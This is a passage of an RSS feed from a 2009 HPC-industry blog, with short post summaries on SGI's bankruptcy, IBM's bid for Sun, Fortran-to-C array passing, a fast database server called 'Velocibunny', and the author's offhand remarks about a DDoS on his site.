      <description>So we all &amp;ldquo;know&amp;rdquo; the prospective fate of SGI &amp;hellip; assets to be sold for a song to Rackable, employees let go &amp;hellip; equity shareholders left holding effectively nothing. Whats odd is that outstanding equity shares haven&amp;rsquo;t been canceled yet. At some point, this suggests that there will be an exchange &amp;hellip; X SGIC shares for 1 share of RACK. But thats not the curious thing. This is.
Last friday, an order was was entered which gave effective veto power to SGIC for any sale of equity over a very specific amount.</description>
    </item>
    
    <item>
      <title>sooo close ... sooo close</title>
      <link>https://blog.scalability.org/2009/04/sooo-close-sooo-close/</link>
      <pubDate>Tue, 07 Apr 2009 21:56:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/sooo-close-sooo-close/</guid>
      <description>Dealing with a strange parameter passing/indexing thingy. Something ain&amp;rsquo;t quite right. Passing allocatable arrays from F90 to C, check. Passing the array metadata (bounds), check. Getting the pointer arithmetic correct (I think), check. Getting the C version of this computational kernel prepped for Cuda-izing? Priceless. Well, ok, not really priceless. Part of a porting service.</description>
    </item>
    
    <item>
      <title>As the economic situation takes its toll ... Isilon trims staff</title>
      <link>https://blog.scalability.org/2009/04/as-the-economic-situation-takes-its-toll-isilon-trims-staff/</link>
      <pubDate>Tue, 07 Apr 2009 12:13:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/as-the-economic-situation-takes-its-toll-isilon-trims-staff/</guid>
      <description>Saw this, this morning on the Reg. The CEO blames the economy. Doesn&amp;rsquo;t surprise me, Isilon kit isn&amp;rsquo;t cheap, and there is something of a spending freeze going on in the economy.</description>
    </item>
    
    <item>
      <title>Alrighty then ... (cooking with fire)</title>
      <link>https://blog.scalability.org/2009/04/alrighty-then-cooking-with-fire/</link>
      <pubDate>Tue, 07 Apr 2009 01:09:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/alrighty-then-cooking-with-fire/</guid>
      <description>Figured out the allocatable array to C passing issue. Now I need to pass the dimensions. Long story, punchline is that Fortran preserves array metadata in its calls with pointers back to its metadata entries in symbol tables (or even with the data itself). C &amp;hellip; not so much. More hack work to make it work, and then we can get to the Cuda portion of the port &amp;hellip; Wahooo!</description>
    </item>
    
    <item>
      <title>Monday morning, an hour before the markets open ...</title>
      <link>https://blog.scalability.org/2009/04/monday-morning-an-hour-before-the-markets-open/</link>
      <pubDate>Mon, 06 Apr 2009 11:59:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/monday-morning-an-hour-before-the-markets-open/</guid>
      <description>And Sun (NASDAQ: JAVA) is already down quite a bit.</description>
    </item>
    
    <item>
      <title>Why can&#39;t banks just pay back the TARP money if they don&#39;t need it?</title>
      <link>https://blog.scalability.org/2009/04/why-cant-banks-just-pay-back-the-tarp-money-if-they-dont-need-it/</link>
      <pubDate>Mon, 06 Apr 2009 11:46:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/why-cant-banks-just-pay-back-the-tarp-money-if-they-dont-need-it/</guid>
      <description>Makes sense &amp;hellip; right? If a bank doesn&amp;rsquo;t need it, it should give it back, with interest. This is what we want. It is the right thing to do. Unless there is something else going on.
Ummm &amp;hellip; er &amp;hellip; ah &amp;hellip;</description>
    </item>
    
    <item>
      <title>Market recovery, dead cat bounce, or ... worse ???</title>
      <link>https://blog.scalability.org/2009/04/market-recovery-dead-cat-bounce-or-worse/</link>
      <pubDate>Mon, 06 Apr 2009 04:41:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/market-recovery-dead-cat-bounce-or-worse/</guid>
      <description>Once, a long while ago, back during my SGI days, SGI had been pummeled for missing our numbers one quarter. There was a brief rally, someone asked if we had turned things around. Experienced commentators talked about how even &amp;ldquo;dead cats bounce&amp;rdquo;. Not exactly the most pleasant of images, but there it was. Obviously, you know how that story turned out. I raise this situation now, as there has been a market rally over the past few days.</description>
    </item>
    
    <item>
      <title>New weather event tonight/tomorrow</title>
      <link>https://blog.scalability.org/2009/04/new-weather-event-tonighttomorrow/</link>
      <pubDate>Mon, 06 Apr 2009 01:00:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/new-weather-event-tonighttomorrow/</guid>
      <description>6+ inches of snow (15cm for those using sane units) expected. Of course, the last time they predicted snow, we got 45 degree sun-shining days. Unfortunately, they appear to be right this time.
[ ](http://www.accuweather.com/radar-large.asp?partner=forecastfox&amp;amp;traveler=0&amp;amp;site=MI_&amp;amp;type=SIR&amp;amp;anim=0&amp;amp;level=state&amp;amp;large=1)</description>
    </item>
    
    <item>
      <title>Ok, classify this one as &#34;fun&#34;</title>
      <link>https://blog.scalability.org/2009/04/ok-classify-this-one-as-fun/</link>
      <pubDate>Mon, 06 Apr 2009 00:52:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/ok-classify-this-one-as-fun/</guid>
      <description>Q: When is an array not an array? A: When it is a Fortran90 allocatable array, and you are pulling out your remaining (&amp;amp;^&amp;amp;$#% hair trying to pass it to a C routine.
Ok, I have found some hope, appealing to some F2003 bits which this compiler supports. But still &amp;hellip; the most likely scenarios is that I have to create an array of pointers to get to the data &amp;hellip; which means that we are likely to have some memory performance hit.</description>
    </item>
    
    <item>
      <title>Breaking: IBM pulls bid for Sun</title>
      <link>https://blog.scalability.org/2009/04/breaking-ibm-pulls-bid-for-sun/</link>
      <pubDate>Sun, 05 Apr 2009 22:56:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/breaking-ibm-pulls-bid-for-sun/</guid>
      <description>Not sure if someone else is offering more. Sun apparently said they didn&amp;rsquo;t want to be negotiating exclusively with IBM, so IBM yanked the bid. I expect Sun&amp;rsquo;s shares (NASDAQ: JAVA) to plummet in the morning, unless they announce their new suitor. Shades of Yahoo+Microsoft. Someone on the Yahoo side did a really bad thing by their shareholders. And got fired for it. [update] More at WSJ. Sun&amp;rsquo;s board rejected the offer as too low.</description>
    </item>
    
    <item>
      <title>Ran BenchmarkSQL on &#34;Velocibunny&#34;</title>
      <link>https://blog.scalability.org/2009/04/ran-benchmarksql-on-velocibunny/</link>
      <pubDate>Sat, 04 Apr 2009 01:10:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/ran-benchmarksql-on-velocibunny/</guid>
      <description>So Velocibunny now has a shiny new set of 5502 Nehalem CPUs in it, 12 GB ram, and 24 SSDs. For laughs, I ran BenchmarkSQL on it. Ok, not for laughs, but the folks who were originally all hot an bothered to run on it sort of disappeared, so I had to come up with some benchmark tests. Oddly enough, BenchmarkSQL was written by one of them. Go figure. I am attempting to understand, in the simplest possible classification scenario, what a good score is and what a bad score is.</description>
    </item>
    
    <item>
      <title>Forbes on IBM&#43;Sun:  There will be blood</title>
      <link>https://blog.scalability.org/2009/04/forbes-on-ibmsun-there-will-be-blood/</link>
      <pubDate>Fri, 03 Apr 2009 15:01:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/forbes-on-ibmsun-there-will-be-blood/</guid>
      <description>John West at InsideHPC comments and links to a Forbes article with a gedanken experiment. The net of this is that huge swaths of Sun offerings would be EOLed. Huge swaths. Which is similar to what John and I said in separate articles. The Forbes article notes something that should give customers some pause:
We agree. This would end a proprietary product, with no real chance of followon going forward. One of the huge dangers in any IT purchase is the possibility of an un-recoverable bricking at some point.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-04-02</title>
      <link>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-02-2/</link>
      <pubDate>Thu, 02 Apr 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-02-2/</guid>
      <description>* @[herrold](http://twitter.com/herrold) Yes.... she&#39;s dead Jim ... this time, it looks like for real. The zombie doesn&#39;t look like its going to walk any time soon [in reply to herrold](http://twitter.com/herrold/statuses/1431586144) [#](http://twitter.com/sijoe/statuses/1435454318)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>More about the SGI bankruptcy</title>
      <link>https://blog.scalability.org/2009/04/more-about-the-sgi-bankruptcy/</link>
      <pubDate>Thu, 02 Apr 2009 00:00:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/more-about-the-sgi-bankruptcy/</guid>
      <description>I didn&amp;rsquo;t have access to all the information (and still don&amp;rsquo;t), just what seeps out in reports. Here is a good report, which suggests that this might not be as pretty a face (and it wasn&amp;rsquo;t pretty) as SGI suggested in its customer letter. Critical aspects not mentioned in public until now appear to be
I had heard it was shopping itself around. But what real value did it have? And what about its liabilities?</description>
    </item>
    
    <item>
      <title>Mastering Cat ... finally the book we all need ...</title>
      <link>https://blog.scalability.org/2009/04/mastering-cat-finally-the-book-we-all-need/</link>
      <pubDate>Wed, 01 Apr 2009 18:55:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/mastering-cat-finally-the-book-we-all-need/</guid>
      <description>Here is the link. Enjoy. (Hat tip: Andrew at Tuxtone)</description>
    </item>
    
    <item>
      <title>ScaleMP steps up to fill the void left by SGI</title>
      <link>https://blog.scalability.org/2009/04/scalemp-steps-up-to-fill-the-void-left-by-sgi/</link>
      <pubDate>Wed, 01 Apr 2009 17:18:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/scalemp-steps-up-to-fill-the-void-left-by-sgi/</guid>
      <description>Shai Fulthem at ScaleMP just sent me a quick note. Here it is reproduced below. With the recent announcement of SGI&amp;rsquo;s (NASDAQ:SGIC) acquisition by Rackable Systems (NASDAQ:RACK), ScaleMP is announcing immediate availability of migration package for existing SGI Altix customers. ScaleMP&amp;rsquo;s vSMP Foundation offers up to 4TB and 128 cores shared memory system, and is available from multiple hardware partners. The recent product expansion to support Nehalem processor as well as multi-rail InfiniBand makes vSMP Foundation an excellent replacement for existing SGI customers.</description>
    </item>
    
    <item>
      <title>SGI is done and sold (heard this rumor yesterday)</title>
      <link>https://blog.scalability.org/2009/04/sgi-is-done-and-sold-heard-this-rumor-yesterday/</link>
      <pubDate>Wed, 01 Apr 2009 11:55:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/sgi-is-done-and-sold-heard-this-rumor-yesterday/</guid>
      <description>[updated] see bottom: SGI will be acquired by Rackable. This said, read the press release. Specifically the portion that indicates that
Yes, this is right (and assuming it is not an April Fools joke), this means SGI file for bankruptcy this morning. They had a looming $5M payment due last Friday to Morgan Stanley. I was searching for information as to whether or not they had made that payment, as I thought that MS might force them into a chapter 7, and sell off their assets.</description>
    </item>
    
    <item>
      <title>And thus it begins ...</title>
      <link>https://blog.scalability.org/2009/04/and-thus-it-begins/</link>
      <pubDate>Wed, 01 Apr 2009 11:37:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/and-thus-it-begins/</guid>
      <description>Please post em if you find em. I suspect it will be a busy news day &amp;hellip; First up: Breaking news, IBM buys Linus Torvalds Second: Turnkey Linux abandons Linux, and becomes Turnkey Windows. I&amp;rsquo;ll update em as I find em.</description>
    </item>
    
    <item>
      <title>Auto industry?  What auto industry?</title>
      <link>https://blog.scalability.org/2009/03/auto-industry-what-auto-industry/</link>
      <pubDate>Mon, 30 Mar 2009 14:28:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/auto-industry-what-auto-industry/</guid>
      <description>Here in Detroit, we have the big 3 &amp;hellip; Ford, GM, and Chrysler. Well, maybe no longer. This morning the government passed judgment on this industry, which had been requesting capital to survive, as the credit markets, despite protestations to the contrary from various sources, is still frozen &amp;hellip; and they (and all other businesses) need capital (and credit) to survive. The government has said (basically) &amp;hellip; its Chapter 11 (or 7) for you.</description>
    </item>
    
    <item>
      <title>So who, exactly, is responsible for the meltdown on Wall Street?</title>
      <link>https://blog.scalability.org/2009/03/so-who-exactly-is-responsible-for-the-meltdown-on-wall-street/</link>
      <pubDate>Sat, 28 Mar 2009 17:45:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/so-who-exactly-is-responsible-for-the-meltdown-on-wall-street/</guid>
      <description>I saw a link to this today. In it there are some juicy bits. Like this:
Hmmm &amp;hellip;.
Ok &amp;hellip; what is Glass-Steagall?
What went wrong was that the housing bubble, which was quite speculative in Florida and Las Vegas, burst. Elsewhere, we had unsustainable growth in &amp;ldquo;value&amp;rdquo; of housing. But this story is &amp;hellip; well &amp;hellip; prescient &amp;hellip; and not in a good way &amp;hellip;
Ok, thats just plain old scary.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-03-25</title>
      <link>https://blog.scalability.org/2009/03/twitter-updates-for-2009-03-25/</link>
      <pubDate>Wed, 25 Mar 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/twitter-updates-for-2009-03-25/</guid>
      <description>* @[insideHPC](http://twitter.com/insideHPC) Volume rules. This is why HPC is, and must, go down market, to desktops. And why accelerators are so important. [in reply to insideHPC](http://twitter.com/insideHPC/statuses/1381719127) [#](http://twitter.com/sijoe/statuses/1381741850) * @[herrold](http://twitter.com/herrold) You should tell you quant friend that we (scalable) are well on our way to 16 GPUs per machine. Currently max 8. Pegasus-gpu [#](http://twitter.com/sijoe/statuses/1382043143)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Cool announcement tomorrow ...</title>
      <link>https://blog.scalability.org/2009/03/cool-announcement-tomorrow/</link>
      <pubDate>Wed, 25 Mar 2009 01:42:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/cool-announcement-tomorrow/</guid>
      <description>:)</description>
    </item>
    
    <item>
      <title>Ok, fixed the over-zealous tweeting ...</title>
      <link>https://blog.scalability.org/2009/03/ok-fixed-the-over-zealous-tweeting/</link>
      <pubDate>Wed, 25 Mar 2009 01:40:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/ok-fixed-the-over-zealous-tweeting/</guid>
      <description>one blog post per tweet is a fast way to get a social networking echo chamber (or feedback loop).</description>
    </item>
    
    <item>
      <title>First, pre-tuning numbers for the *small* &#34;velocibunny&#34;</title>
      <link>https://blog.scalability.org/2009/03/first-pre-tuning-numbers-for-the-small-velocibunny/</link>
      <pubDate>Wed, 25 Mar 2009 01:37:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/first-pre-tuning-numbers-for-the-small-velocibunny/</guid>
      <description>Ok, I know you have been asking &amp;hellip; What is a &amp;ldquo;velocibunny&amp;rdquo; Think of it as &amp;hellip; um &amp;hellip; a very very fast JackRabbit. Not that JackRabbit isn&amp;rsquo;t fast &amp;hellip; it appears to be best in its class in performance. But &amp;ldquo;velocibunny&amp;rdquo; is faster. A lot faster. How fast and what workloads?
It is specifically designed to be usable as a very fast database engine. As in PostgreSQL and related. Now mind you, it is in lab with the first iteration of an OS load, and ** NO TUNING** This is &amp;ldquo;build the RAID10 out of the box and start using it with a base load&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>@herrold You should tell you q...</title>
      <link>https://blog.scalability.org/2009/03/herrold-you-should-tell-you-q/</link>
      <pubDate>Tue, 24 Mar 2009 14:44:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/herrold-you-should-tell-you-q/</guid>
      <description>@herrold You should tell you quant friend that we (scalable) are well on our way to 16 GPUs per machine. Currently max 8. Pegasus-gpu</description>
    </item>
    
    <item>
      <title>@insideHPC Volume rules.  This...</title>
      <link>https://blog.scalability.org/2009/03/insidehpc-volume-rules-this/</link>
      <pubDate>Tue, 24 Mar 2009 13:43:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/insidehpc-volume-rules-this/</guid>
      <description>@insideHPC Volume rules. This is why HPC is, and must, go down market, to desktops. And why accelerators are so important.</description>
    </item>
    
    <item>
      <title>@herrold 2nd derivative is cur...</title>
      <link>https://blog.scalability.org/2009/03/herrold-2nd-derivative-is-cur/</link>
      <pubDate>Tue, 24 Mar 2009 01:59:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/herrold-2nd-derivative-is-cur/</guid>
      <description>@herrold 2nd derivative is curvature, how quickly the slope changes. Sadly it looks like it is changing in the wrong direction.</description>
    </item>
    
    <item>
      <title>We built most of &#34;Velocibunny&#34;...</title>
      <link>https://blog.scalability.org/2009/03/we-built-most-of-velocibunny/</link>
      <pubDate>Tue, 24 Mar 2009 01:58:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/we-built-most-of-velocibunny/</guid>
      <description>We built most of &amp;ldquo;Velocibunny&amp;rdquo; today. The x5492&amp;rsquo;s didn&amp;rsquo;t work, so we used 5310&amp;rsquo;s. This was the fastest RAID build I have ever seen &amp;hellip;</description>
    </item>
    
    <item>
      <title>The economy&#39;s toll ...</title>
      <link>https://blog.scalability.org/2009/03/the-economys-toll/</link>
      <pubDate>Mon, 23 Mar 2009 22:07:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/the-economys-toll/</guid>
      <description>I read today about the Ann Arbor news going out of the atom pushing business, and getting into the bit pushing business. Given that most news papers are advertisement supported, and Google has eaten most everyone&amp;rsquo;s lunch on advertising &amp;hellip; this isn&amp;rsquo;t a guaranteed strategy by any measure. I wish them luck. But that isn&amp;rsquo;t what caught my eye. Its the unemployment rate, and its&#39; first derivative (e.g. slope), in Michigan.</description>
    </item>
    
    <item>
      <title>More about the Sun-IBM thing</title>
      <link>https://blog.scalability.org/2009/03/more-about-the-sun-ibm-thing/</link>
      <pubDate>Sun, 22 Mar 2009 17:22:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/more-about-the-sun-ibm-thing/</guid>
      <description>John L over at InsideHPC writes about an article that appears in the print version of the New York Times. In this article, John notes that IBM is scouring Sun Microsystems contracts &amp;hellip; well, their lawyers are doing due diligence, in large part, to help figure out if there is something of value there. John opines that there are many things of great value. As I see it, the market has indicated otherwise, by valuing Sun Micro stock where it is now.</description>
    </item>
    
    <item>
      <title>Failblog ... couldn&#39;t stop lau...</title>
      <link>https://blog.scalability.org/2009/03/failblog-couldnt-stop-lau/</link>
      <pubDate>Fri, 20 Mar 2009 02:11:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/failblog-couldnt-stop-lau/</guid>
      <description>Failblog &amp;hellip; couldn&amp;rsquo;t stop laughing at this &amp;hellip; http://tinyurl.com/c2qm4o</description>
    </item>
    
    <item>
      <title>Eek!  /. on an exploit against processors ...</title>
      <link>https://blog.scalability.org/2009/03/eek-on-an-exploit-against-processors/</link>
      <pubDate>Thu, 19 Mar 2009 18:39:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/eek-on-an-exploit-against-processors/</guid>
      <description>Nasty. See the link</description>
    </item>
    
    <item>
      <title>DDoS saga continues ... the revenge of the attacked (mwahahaha!)</title>
      <link>https://blog.scalability.org/2009/03/ddos-saga-continues-the-revenge-of-the-attacked-mwahahaha/</link>
      <pubDate>Thu, 19 Mar 2009 17:20:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/ddos-saga-continues-the-revenge-of-the-attacked-mwahahaha/</guid>
      <description>They pissed me off &amp;hellip; driving my load up from 0.00 to 0.01 like that &amp;hellip; Using up the &amp;hellip; I don&amp;rsquo;t know &amp;hellip; 10kB/minute &amp;hellip; bandwidth &amp;hellip; Look at the blue arrow. This is where I told our &amp;hellip; sentry &amp;hellip; to get a little more proactive about &amp;hellip; defense.
[ ](/images/DDoS_revenge_of_the_attacked.png)
Its a start. Their network is a scale free net. We could collapse it fairly easily. In fact, I am thinking about readying that change, so if I need it (that is, if they get serious about mailbombing us, and not this pretty whimpy thing here), I can turn it on at a moments notice.</description>
    </item>
    
    <item>
      <title>3 ... 2 ... 1 ....  Yup, DDoS begins ...</title>
      <link>https://blog.scalability.org/2009/03/3-2-1-yup-ddos-begins/</link>
      <pubDate>Thu, 19 Mar 2009 12:46:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/3-2-1-yup-ddos-begins/</guid>
      <description>Its like clockwork I tell ya &amp;hellip; Like clockwork &amp;hellip;
[ ](/images/DDoS-March-2009.png)
I could set my watch by this &amp;hellip;</description>
    </item>
    
    <item>
      <title>Parrot hits 1.0</title>
      <link>https://blog.scalability.org/2009/03/parrot-hits-10/</link>
      <pubDate>Wed, 18 Mar 2009 20:52:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/parrot-hits-10/</guid>
      <description>Parrot you say? Think of it as the engine which underlies Perl6 and quite a few other dynamic languages &amp;hellip;
One engine to run them all, and in the computer, bind them. Hopefully this means (also) that Perl6 will formally ship this Christmas. The running joke is that it will ship around Christmas, only the year is indeterminate.
More seriously, I&amp;rsquo;ve been using Perl and dynamic languages in general for more than a decade.</description>
    </item>
    
    <item>
      <title>Sun (possibly) to be acquired by IBM?</title>
      <link>https://blog.scalability.org/2009/03/sun-possibly-to-be-acquired-by-ibm/</link>
      <pubDate>Wed, 18 Mar 2009 13:05:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/sun-possibly-to-be-acquired-by-ibm/</guid>
      <description>The NYT reports talks in progress. Not sure if its real. Need to think on this somewhat &amp;hellip; makes sense as Sun is so cheap, but like many other acquisitions, this one is likely to give some folks a real bad case of indigestion. There are a few elements of Sun worth having, and some &amp;hellip; not so much. Will be interesting to see if this is real, and if so, what the market impact would be.</description>
    </item>
    
    <item>
      <title>HPC @ Cisco?</title>
      <link>https://blog.scalability.org/2009/03/hpc-cisco/</link>
      <pubDate>Tue, 17 Mar 2009 00:40:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/hpc-cisco/</guid>
      <description>Cisco announced a new product today, code named California. You can read some of the info here. This system, also known more formally as a &amp;ldquo;Unified Computing System&amp;rdquo; aims to integrate computing, networking and storage into a single managed system. Cisco appears to be aiming for what it believes to be a sweet spot in virtualized infrastructures. Their play appears to be focused upon virtualization. They tied in a slew of players on the software stack side, and Accenture on the services side.</description>
    </item>
    
    <item>
      <title>Why is (the) Sun trying to peak out from behind the clouds (of computing)</title>
      <link>https://blog.scalability.org/2009/03/why-is-the-sun-trying-to-peak-out-from-behind-the-clouds-of-computing/</link>
      <pubDate>Mon, 16 Mar 2009 12:10:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/why-is-the-sun-trying-to-peak-out-from-behind-the-clouds-of-computing/</guid>
      <description>Maybe later on this week I&amp;rsquo;ll write up a more detailed set of things I&amp;rsquo;ve been thinking of, while I see another &amp;ldquo;fad&amp;rdquo; grip the computing world. Until then, John West at InsideHPC.com asks a question of why is Sun coming back to the cloud table? John points* out
I&amp;rsquo;ll save my &amp;ldquo;cloud&amp;rdquo; comments until the future article. Though I might point out that for a new investment in technology to build a cloud computing facility, the business model generally needs you to spend as little as possible per system and per gigabyte of storage.</description>
    </item>
    
    <item>
      <title>It is sure to be removed, so look at this ASAP</title>
      <link>https://blog.scalability.org/2009/03/it-is-sure-to-be-removed-so-look-at-this-asap/</link>
      <pubDate>Sat, 14 Mar 2009 20:37:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/it-is-sure-to-be-removed-so-look-at-this-asap/</guid>
      <description>Back at SGI, the company did a pitful job explaining who it was, what it did, and how it did it, not to mention why it was important. This is marketing, basic simple, get the message out marketing. In the 90&amp;rsquo;s, SGI was a great company. We had at the time, great products. And, as we naively believed that the world would beat a path to our door in order to get them, we sorta &amp;hellip; kinda &amp;hellip; forgot to tell people about what we did and why it was important.</description>
    </item>
    
    <item>
      <title>ok, looks like it is mostly on...</title>
      <link>https://blog.scalability.org/2009/03/ok-looks-like-it-is-mostly-on/</link>
      <pubDate>Sat, 14 Mar 2009 17:13:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/ok-looks-like-it-is-mostly-on/</guid>
      <description>ok, looks like it is mostly one way &amp;hellip; oh well &amp;hellip; [update] Nope &amp;hellip; bidirectional &amp;hellip; with a bit of latency though. I now have Wordpress talking nicely with twitter, and Wordpress and LinkedIn tied together. Scary. Social networking gone wild. Too bad there are few if any business models that will work for these folks.</description>
    </item>
    
    <item>
      <title>testing the reverse link.... t...</title>
      <link>https://blog.scalability.org/2009/03/testing-the-reverse-link-t/</link>
      <pubDate>Sat, 14 Mar 2009 17:09:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/testing-the-reverse-link-t/</guid>
      <description>testing the reverse link&amp;hellip;. twitter to blog &amp;hellip; Content free post, just testing shiny new tools (everyone say &amp;ldquo;oooohhh&amp;rdquo;)</description>
    </item>
    
    <item>
      <title>WPtwitter test 1 of 2, from WP to twitter ...</title>
      <link>https://blog.scalability.org/2009/03/wptwitter-test-1-of-2-from-wp-to-twitter/</link>
      <pubDate>Sat, 14 Mar 2009 16:42:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/wptwitter-test-1-of-2-from-wp-to-twitter/</guid>
      <description>this is a test, had this been an actual post, you would have been given content to read &amp;hellip;</description>
    </item>
    
    <item>
      <title>Also working on some business ...</title>
      <link>https://blog.scalability.org/2009/03/also-working-on-some-business/</link>
      <pubDate>Sat, 14 Mar 2009 16:12:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/also-working-on-some-business/</guid>
      <description>Also working on some business proposals/models to pursue a number of funding (equity/etc) opportunities.</description>
    </item>
    
    <item>
      <title>Working on storage software up...</title>
      <link>https://blog.scalability.org/2009/03/working-on-storage-software-up/</link>
      <pubDate>Sat, 14 Mar 2009 16:12:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/working-on-storage-software-up/</guid>
      <description>Working on storage software updates. Making the software simpler/easier to use. Working on the web interface to status/updates.</description>
    </item>
    
    <item>
      <title>On HPC benchmarking: measure and report the important things that users care about ... wall clock time</title>
      <link>https://blog.scalability.org/2009/03/on-hpc-benchmarking-measure-and-report-the-important-things-that-users-care-about-wall-clock-time/</link>
      <pubDate>Thu, 12 Mar 2009 12:54:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/on-hpc-benchmarking-measure-and-report-the-important-things-that-users-care-about-wall-clock-time/</guid>
      <description>John West at InsideHPC.com points to a great article this morning from Intel. Well, ok, I didn&amp;rsquo;t agree with the initial tone.
This is a bit on the (negative) sensationalist side, though the author is correct in pointing out that these technologies have been overhyped. I&amp;rsquo;ve been using a phrase to discuss this and other issues for a while. There are no silver bullets. Or as Robert Heinlein once wrote, TANSTAAFL.</description>
    </item>
    
    <item>
      <title>Been avoiding talking about SGI ... but it looks like a whole slew of events is about to get started</title>
      <link>https://blog.scalability.org/2009/03/been-avoiding-talking-about-sgi-but-it-looks-like-a-whole-slew-of-events-is-about-to-get-started/</link>
      <pubDate>Thu, 12 Mar 2009 02:39:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/been-avoiding-talking-about-sgi-but-it-looks-like-a-whole-slew-of-events-is-about-to-get-started/</guid>
      <description>John West at InsideHPC has a brief article on SGI, noting that they have received their second delisting notice. As of now, SGI, a company I spent 6 years at, and really enjoyed my time there (apart from the decisions various company senior management made), which hit a $4B valuation at one point, is currently worth $5.24M.
SGI was once a great company. What made SGI great were the people, some of whom are still there.</description>
    </item>
    
    <item>
      <title>1.3 PB lustre OSSes/OSTs with ...</title>
      <link>https://blog.scalability.org/2009/03/13-pb-lustre-ossesosts-with/</link>
      <pubDate>Wed, 11 Mar 2009 18:03:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/13-pb-lustre-ossesosts-with/</guid>
      <description>1.3 PB lustre OSSes/OSTs with a Velocibunny MDS quote &amp;hellip; under $800k &amp;hellip; wow!</description>
    </item>
    
    <item>
      <title>1.3PB Lustre system with a Velocibunny MDS for ~$800k USD</title>
      <link>https://blog.scalability.org/2009/03/13pb-lustre-system-with-a-velocibunny-mds-for-800k-usd/</link>
      <pubDate>Wed, 11 Mar 2009 17:48:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/13pb-lustre-system-with-a-velocibunny-mds-for-800k-usd/</guid>
      <description>This was a fun exercise, not sure if our WAG is in the right ball-park though, as some of the elements won&amp;rsquo;t have real price tags for a while. This was an intelligent guess based upon comparable systems pricing. 28x 4U 48 TB JackRabbit (JR4) units with 32 GB ram, 2x QDR IB ports, 2x SSD boot drives in a RAID1 + a &amp;ldquo;Velocibunny&amp;rdquo; MDS (1.5 TB of the fastest non-RAMdisk based server around) running Lustre.</description>
    </item>
    
    <item>
      <title>Generating quote after quote a...</title>
      <link>https://blog.scalability.org/2009/03/generating-quote-after-quote-a/</link>
      <pubDate>Wed, 11 Mar 2009 15:56:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/generating-quote-after-quote-a/</guid>
      <description>Generating quote after quote after &amp;hellip; no rest for the wicked &amp;hellip;</description>
    </item>
    
    <item>
      <title>debugging iscsi issues on two ...</title>
      <link>https://blog.scalability.org/2009/03/debugging-iscsi-issues-on-two/</link>
      <pubDate>Wed, 11 Mar 2009 04:16:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/debugging-iscsi-issues-on-two/</guid>
      <description>debugging iscsi issues on two different kernels &amp;hellip; yay &amp;hellip;</description>
    </item>
    
    <item>
      <title>tweet tweet</title>
      <link>https://blog.scalability.org/2009/03/tweet-tweet/</link>
      <pubDate>Wed, 11 Mar 2009 03:43:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/tweet-tweet/</guid>
      <description>Maybe I am not such an old fogey &amp;hellip; on twitter now. Whats next &amp;hellip; facebook? Darn &amp;hellip; I purposely went all Luddite over MySpace &amp;hellip; was hoping to do the same thing with facebook. Now how to figure out how to link to the blog &amp;hellip;</description>
    </item>
    
    <item>
      <title>Don&#39;t know why this is the case ...</title>
      <link>https://blog.scalability.org/2009/03/dont-know-why-this-is-the-case/</link>
